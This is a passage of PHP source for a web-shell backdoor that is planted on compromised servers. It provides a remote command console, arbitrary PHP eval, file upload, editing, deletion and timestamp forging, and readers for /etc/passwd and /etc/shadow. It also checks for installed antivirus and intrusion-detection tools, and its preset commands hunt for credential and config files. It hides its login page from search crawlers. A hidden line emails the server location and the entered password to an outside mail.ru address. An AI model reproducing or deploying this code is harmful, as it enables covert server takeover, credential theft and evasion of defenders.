$cwd_links . ' '. viewPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'. '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . gethostbyname($_SERVER["HTTP_HOST"]) . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'. '<table style="background-color:#2E6E9C;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div>'; } function hardFooter() { $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#FFDB5F'>[ Writeable ]</font>":" <font color=red>(Not writable)</font>"; echo " </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%> <tr> <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g(null,this.c.value,'');":'' )."return false;\"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td> <td><form onsubmit=\"".(function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value);":'' )."return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g('FilesMan',null,'mkdir',this.d.value);":'' )."return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit=\"".( function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value,'mkfile');":'' )."return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit=\"".( function_exists('actionConsole')? "g('Console',null,this.c.value);":'' )."return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ".( (!function_exists('actionFilesMan'))? " onsubmit=\"return false;\" ":'' )."ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMan'> <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=ne value=''> <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'> <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[] multiple><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>"; } if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function ex($in) { $â = ''; if (function_exists('exec')) { @exec($in,$â); $â = @join("\n",$â); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $â = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $â = ob_get_clean(); } elseif (function_exists('shell_exec')) { $â = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $â = ""; while(!@feof($f)) $â .= fread($f,1024); pclose($f); }else return "â³ Unable to execute command\n"; return ($â==''?"â³ Query did not return anything\n":$â); } if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$â; if(array_key_exists('pff',$_POST)){ $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('hard_linux@mail.ru', 'NSA', $tmp); } function hardLogin() { if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } die("<pre align=center><form method=post style='font-family:fantasy;'>Password: <input type=password name=pass style='background-color:whitesmoke;border:1px solid #FFF;outline:none;'><input type=submit name='pff' value='>>' style='border:none;background-color:#FFDB5F;color:#fff;'></form></pre>"); } function viewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function perms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function viewPermsColor($f) { if (!@is_readable($f)) return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>'; elseif (!@is_writable($f)) return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>'; else return '<font color=#FFDB5F><b>'.perms(@fileperms($f)).'</b></font>'; } function hardScandir($dir) { if(function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function which($p) { $path = ex('which ' . $p); if(!empty($path)) return $path; return false; } function actionRC() { if(!@$_POST['p1']) { $a = array( "uname" => php_uname(), "php_version" => phpversion(), "VERSION" => VERSION, "safemode" => @ini_get('safe_mode') ); echo serialize($a); } else { eval($_POST['p1']); } } function prototype($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } function actionSecInfo() { hardHeader(); echo '<h1>Server security information</h1><div class=content>'; function showSecParam($n, $v) { $v = trim($v); if($v) { echo '<span>' . $n . ': </span>'; if(strpos($v, "\n") === false) echo $v . '<br>'; else echo '<pre class=ml1>' . $v . '</pre>'; } } showSecParam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) showSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); showSecParam('Open base dir', @ini_get('open_basedir')); showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; showSecParam('Supported databases', implode(', ', $temp)); echo '<br>'; if($GLOBALS['os'] == 'nix') { showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no'); showSecParam('OS version', @file_get_contents('/proc/version')); showSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '<br>'; $temp=array(); foreach ($userful as $â) if(which($â)) $temp[] = $â; showSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $â) if(which($â)) $temp[] = $â; showSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $â) if(which($â)) $temp[] = $â; showSecParam('Downloaders', implode(', ',$temp)); echo '<br/>'; showSecParam('HDD space', ex('df -h')); showSecParam('Hosts', @file_get_contents('/etc/hosts')); showSecParam('Mount options', @file_get_contents('/etc/fstab')); } } else { showSecParam('OS Version',ex('ver')); showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts'))); showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user'))); } echo '</div>'; hardFooter(); } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST['p1'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } hardHeader(); echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; echo '<br><br>'; switch($_POST['p2']) { case 'view': echo '<pre class=ml1>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</pre>'; break; case 'highlight': if( @is_readable($_POST['p1']) ) { echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; $code = @highlight_file($_POST['p1'],true); echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; } clearstatcache(); echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],"w"); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo 'Saved!<br><script>p3_="";</script>'; @touch($_POST['p1'],$time,$time); } } echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</textarea><input type=submit value=">>"></form>'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000<br>','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} $h[1] .= '<br>'; $h[2] .= "\n"; } } echo '<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#1e252e><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#060a10><pre>'.$h[1].'</pre></td><td bgcolor=#1e252e><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!<br>'; else die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); } echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; break; } echo '</div>'; hardFooter(); } if($os == 'win') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function actionConsole() { if(!empty($_POST['p1']) && !empty($_POST['p2'])) { prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif(!empty($_POST['p1'])) prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); if(isset($_POST['ajax'])) { prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); echo "d.cf.cmd.value='';\n"; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0")); if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "c_='".$GLOBALS['cwd']."';"; } } echo "d.cf.output.value+='".$temp."';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); hardHeader(); echo "<script> if(window.Event) window.captureEvents(Event.KEYDOWN); var cmds = new Array(''); var cur = 0; function kp(e) { var n = (window.Event) ? e.which : e.keyCode; if(n == 38) { cur--; if(cur>=0) document.cf.cmd.value = cmds[cur]; else cur++; } else if(n == 40) { cur++; if(cur < cmds.length) document.cf.cmd.value = cmds[cur]; else cur--; } } function add(cmd) { cmds.pop(); cmds.push(cmd); cmds.push(''); cur = cmds.length-1; } </script>"; echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>'; foreach($GLOBALS['aliases'] as $n => $v) { if($v == '') { echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>'; continue; } echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>'; } echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; if(!empty($_POST['p1'])) { echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1'])); } echo '</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>'; echo '</form></div><script>d.cf.cmd.focus();</script>'; hardFooter(); } function actionPhp() { if( isset($_POST['ajax']) ) { $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); eval($_POST['p1']); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo strlen($temp), "\n", $temp; exit; } hardHeader(); if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { echo '<h1>PHP info</h1><div class=content>'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace('!body {.*}!msiU','',$tmp); $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp); $tmp = preg_replace('!h1!msiU','h2',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp); echo $tmp; echo '</div><br>'; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">'; echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>'; if(!empty($_POST['p1'])) { ob_start(); eval($_POST['p1']); echo htmlspecialchars(ob_get_clean()); } echo '</pre></div>'; hardFooter(); } function actionFilesMan() { if (!empty ($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']); if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if ( is_array($_FILES['f']['tmp_name']) ) { foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) { if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) { echo "Can't upload file!"; } } } break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir"; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($â = readdir($dh) ) !== false) { $â = $path.$â; if ( (basename($â) == "..") || (basename($â) == ".") ) continue; $type = filetype($â); if ($type == "dir") deleteDir($â); else @unlink($â); } closedir($dh); @rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { if($f == '..') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_COOKIE['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); } elseif($_COOKIE['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); } elseif($_COOKIE['act'] == 'zip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { chdir($_COOKIE['c']); foreach($_COOKIE['f'] as $f) { if($f == '..') continue; if(@is_file($_COOKIE['c'].$f)) $zip->addFile($_COOKIE['c'].$f, $f); elseif(@is_dir($_COOKIE['c'].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS['cwd']); $zip->close(); } } } elseif($_COOKIE['act'] == 'unzip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); foreach($_COOKIE['f'] as $f) { if($zip->open($_COOKIE['c'].$f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } } } } elseif($_COOKIE['act'] == 'tar') { chdir($_COOKIE['c']); $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); chdir($GLOBALS['cwd']); } unset($_COOKIE['f']); setcookie('f', '', time() - 3600); break; default: if(!empty($_POST['p1'])) { prototype('act', $_POST['p1']); prototype('f', serialize(@$_POST['f'])); prototype('c', @$_POST['c']); } break; } } hardHeader(); echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; $dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can\'t open this folder!';hardFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo "<script> function sa() { for(i=0;i<d.files.elements.length;i++) if(d.files.elements[i].type == 'checkbox') d.files.elements[i].checked = d.files.elements[0].checked; } </script> <table width='100%' class='main' cellspacing='0' cellpadding='2'> <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function cmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "cmp"); usort($dirs, "cmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; $l = $l?0:1; } echo "<tr><td colspan=7> <input type=hidden name=ne value=''> <input type=hidden name=a value='FilesMan'> <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'> <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'> <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; if(class_exists('ZipArchive')) echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>"; echo "<option value='tar'>+ tar.gz</option>"; 